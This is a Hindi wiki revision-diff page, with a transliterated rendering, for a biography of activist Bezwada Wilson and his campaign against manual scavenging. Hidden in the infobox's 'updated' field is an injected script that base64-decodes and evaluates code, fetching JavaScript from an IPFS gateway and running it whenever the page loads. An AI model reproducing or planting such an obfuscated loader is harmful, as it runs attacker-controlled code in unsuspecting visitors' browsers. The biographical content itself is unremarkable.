Difference between revisions of "बेज़वाडा विल्सन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "जरूर" to "ज़रूर")
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
'''बेज़वाडा विल्सन''' ([[अंग्रेज़ी]]: ''Bezwada Wilson'', जन्म: [[1966]], [[कर्नाटक]]) 'सफाई कर्मचारी आंदोलन' के संयोजक हैं। बेज़वाडा विल्सन को वर्ष [[2016]] में [[रेमन मैग्सेसे पुरस्कार]] से सम्मानित किया गया है।  
+
{{सूचना बक्सा प्रसिद्ध व्यक्तित्व
 +
|चित्र=Bezwada-wilson.jpg
 +
|चित्र का नाम=बेज़वाडा विल्सन
 +
|पूरा नाम=बेज़वाडा विल्सन
 +
|अन्य नाम=
 +
|जन्म= [[1966]]
 +
|जन्म भूमि=[[कर्नाटक]]
 +
|मृत्यु=
 +
|मृत्यु स्थान=
 +
|अभिभावक=
 +
|पति/पत्नी=
 +
|संतान=
 +
|गुरु=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=
 +
|मुख्य रचनाएँ=
 +
|विषय=
 +
|खोज=
 +
|भाषा=
 +
|शिक्षा=स्नातक (राजनीति विज्ञान)
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि=[[रेमन मैग्सेसे पुरस्कार]]
 +
|प्रसिद्धि= 'सफाई कर्मचारी आंदोलन' के संयोजक
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|17:55, 3 अगस्त 2016 (IST)}}
 +
}}
 +
'''बेज़वाडा विल्सन''' ([[अंग्रेज़ी]]: ''Bezwada Wilson'', जन्म: [[1966]], [[कर्नाटक]]) प्रसिद्ध सामाजिक कार्यकर्ता एवं 'सफाई कर्मचारी आंदोलन' के संयोजक हैं। बेज़वाडा विल्सन को वर्ष [[2016]] में [[रेमन मैग्सेसे पुरस्कार]] से सम्मानित किया गया है।  
 
==संक्षिप्त परिचय==
 
==संक्षिप्त परिचय==
 
* [[1966]] में कर्नाटक के कोलार गोल्ड फील्ड में जन्मे विल्सन का ताल्लुक एक दलित परिवार से है।
 
* [[1966]] में कर्नाटक के कोलार गोल्ड फील्ड में जन्मे विल्सन का ताल्लुक एक दलित परिवार से है।
Line 5: Line 45:
 
* विल्सन के माता-पिता मैला ढोने का काम करते थे।
 
* विल्सन के माता-पिता मैला ढोने का काम करते थे।
 
* [[1986]] में विल्सन ने फैसला किया कि [[भारत]] में सिर पर मैला ढोने का काम खत्म कराने के लिए आंदोलन शुरू किया जाए।
 
* [[1986]] में विल्सन ने फैसला किया कि [[भारत]] में सिर पर मैला ढोने का काम खत्म कराने के लिए आंदोलन शुरू किया जाए।
* विल्सन बताते हैं, "20 साल का होने पर मैंने अपनी सफाई कर्मचारी कॉलोनी के बच्चों को पढ़ाना शुरू किया। मैं ये भी जानना चाहता था कि बच्चे आखिर स्कूल क्यों छोड़ रहे थे?
+
* विल्सन बताते हैं, "20 साल का होने पर मैंने अपनी सफाई कर्मचारी कॉलोनी के बच्चों को पढ़ाना शुरू किया। मैं ये भी जानना चाहता था कि बच्चे आखिर स्कूल क्यों छोड़ रहे थे? पता चला कि बच्चों के पिता कमाई का ज्यादातर हिस्सा शराब में खर्च कर रहे थे। पूछने पर बताया कि वो जो काम करते थे, उसके लिए शराब पीना ज़रूरी था। जानने पर पता चला कि वे लोग मैला ढोते थे। मैंने तय किया इसके लिए कुछ करना होगा। उसके बाद हमने आंदोलन चलाया। [[1993]] में सरकार ने मैला ढोने के कस्टम के ख़िलाफ़ कानून बनाया।"
पता चला कि बच्चों के पिता कमाई का ज्यादातर हिस्सा शराब में खर्च कर रहे थे। पूछने पर बताया कि वो जो काम करते थे, उसके लिए शराब पीना जरूरी था। जानने पर पता चला कि वे लोग मैला ढोते थे। मैंने तय किया इसके लिए कुछ करना होगा। उसके बाद हमने आंदोलन चलाया। [[1993]] में सरकार ने मैला ढोने के कस्टम के खिलाफ कानून बनाया।"
 
 
* एक अनुमान के मुताबिक, भारत में सिर पर मैला ढोने वाले करीब 6 लाख लोगों में से 3 लाख को विल्सन ने इस काम से मुक्त कराया है।
 
* एक अनुमान के मुताबिक, भारत में सिर पर मैला ढोने वाले करीब 6 लाख लोगों में से 3 लाख को विल्सन ने इस काम से मुक्त कराया है।
* सफाई कर्मचारी आंदोलन के भारत के 500 जिलों में 7 हजार से ज्यादा मेंबर हैं।
+
* सफाई कर्मचारी आंदोलन के भारत के 500 ज़िलों में 7 हज़ार से ज़्यादा सदस्य हैं।
* बेज़वाडा विल्सन बीते 32 साल से इस आंदोलन से जुड़े हुए हैं।<ref>{{cite web |url=http://surshree.blogspot.in/2008/08/blog-post_26.html |title= ध्रुपद एक समृद्ध गायन शैली|accessmonthday= 20 जनवरी|accessyear=2016 |last= |first= |authorlink= |format= html|publisher=surshree.blogspot.in |language=हिन्दी }}</ref>
+
* बेज़वाडा विल्सन बीते 32 साल से इस आंदोलन से जुड़े हुए हैं।<ref>{{cite web |url=http://hindi.news24online.com/tm-krishna-bezwada-wilson-among-winners-of-2016-ramon-magsaysay-award-58/ |title=टीएम कृष्णा, विल्सन को मिला 2016 का मैग्सेसे अवॉर्ड
 +
|accessmonthday= 29 जुलाई|accessyear=2016 |last= |first= |authorlink= |format= html|publisher=news 24 |language=हिन्दी }}</ref>
 
==सम्मान==
 
==सम्मान==
[[भारत]] के प्रसिद्ध सामाजिक कार्यकर्ता बेजवाड़ा विल्सन और शास्त्रीय संगीतकार एवं गायक टी. एम. कृष्णा को वर्ष [[2016]] का [[रेमन मैग्सेसे पुरस्कार|रेमन मैग्सेसे अवॉर्ड]] देने का एलान हुआ है।
+
[[भारत]] के प्रसिद्ध सामाजिक कार्यकर्ता बेजवाड़ा विल्सन को वर्ष [[2016]] का [[रेमन मैग्सेसे पुरस्कार|रेमन मैग्सेसे अवॉर्ड]] मिला है।
  
  
Line 18: Line 58:
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
*[http://rmaward.asia/awardees/bezwada-wilson/ Wilson, Bezwada]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{रेमन मैग्सेसे पुरस्कार}}
 
{{रेमन मैग्सेसे पुरस्कार}}

Revision as of 10:51, 2 January 2018

bezavada vilsan
poora nam bezavada vilsan
janm 1966
janm bhoomi karnatak
shiksha snatak (rajaniti vijnan)
puraskar-upadhi reman maigsese puraskar
prasiddhi 'saphaee karmachari aandolan' ke sanyojak
nagarikata bharatiy
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bezavada vilsan (aangrezi: Bezwada Wilson, janm: 1966, karnatak) prasiddh samajik karyakarta evan 'saphaee karmachari aandolan' ke sanyojak haian. bezavada vilsan ko varsh 2016 mean reman maigsese puraskar se sammanit kiya gaya hai.

sankshipt parichay

  • 1966 mean karnatak ke kolar gold phild mean janme vilsan ka talluk ek dalit parivar se hai.
  • bezavada p aaulitikal saians mean grejuet haian. apane parivar mean itana padhane vale akele shakhs haian.
  • vilsan ke mata-pita maila dhone ka kam karate the.
  • 1986 mean vilsan ne phaisala kiya ki bharat mean sir par maila dhone ka kam khatm karane ke lie aandolan shuroo kiya jae.
  • vilsan batate haian, "20 sal ka hone par maianne apani saphaee karmachari k aauloni ke bachchoan ko padhana shuroo kiya. maian ye bhi janana chahata tha ki bachche akhir skool kyoan chho d rahe the? pata chala ki bachchoan ke pita kamaee ka jyadatar hissa sharab mean kharch kar rahe the. poochhane par bataya ki vo jo kam karate the, usake lie sharab pina zaroori tha. janane par pata chala ki ve log maila dhote the. maianne tay kiya isake lie kuchh karana hoga. usake bad hamane aandolan chalaya. 1993 mean sarakar ne maila dhone ke kastam ke khilaf kanoon banaya."
  • ek anuman ke mutabik, bharat mean sir par maila dhone vale karib 6 lakh logoan mean se 3 lakh ko vilsan ne is kam se mukt karaya hai.
  • saphaee karmachari aandolan ke bharat ke 500 ziloan mean 7 hazar se zyada sadasy haian.
  • bezavada vilsan bite 32 sal se is aandolan se ju de hue haian.[1]

samman

bharat ke prasiddh samajik karyakarta bejava da vilsan ko varsh 2016 ka reman maigsese av aaurd mila hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. tiem krishnaa, vilsan ko mila 2016 ka maigsese av aaurd (hindi) (html) news 24. abhigaman tithi: 29 julaee, 2016.

bahari k diyaan

sanbandhit lekh